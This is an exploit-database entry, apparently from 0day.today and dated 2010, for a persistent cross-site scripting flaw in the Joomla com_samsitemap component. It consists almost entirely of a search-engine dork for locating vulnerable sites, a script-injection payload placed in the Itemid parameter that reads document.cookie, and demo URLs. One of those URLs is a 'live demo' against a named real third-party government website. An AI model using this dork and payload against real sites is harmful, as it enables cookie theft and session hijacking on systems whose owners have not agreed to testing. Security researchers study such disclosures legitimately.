id: 13307
date: 02/14/2010
title: Joomla Component com_samsitemap Persistent XSS Vulnerability
author: n/a
cves: 

============================================================
Joomla Component com_samsitemap Persistent XSS Vulnerability
============================================================




[+]Title                Joomla   Component  (com_samsitemap)  Persistent XSS Vulnerability
[+]Tested on     Win Xp Sp 2/3
---------------------------------------------------------------------------


[+] Dork: inurl:"com_samsitemap"

==========================================


[+].  XSS Vulnerability
=+=+=+=+=+=+=+=+=+

[P0C]:  http://127.0.0.1/path/index.php?option=com_samsitemap&Itemid=[XSS] 


[XSS]: "><script>alert(document.cookie)</script>


[D3m0]:  http://127.0.0.1/path/index.php?option=com_samsitemap&Itemid="><script>alert(document.cookie)</script>


[L!v3 D3m0]: http://eoepcanamero.juntaextremadura.net/index.php?option=com_samsitemap&Itemid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E



#  0day.today [2023-03-23]  #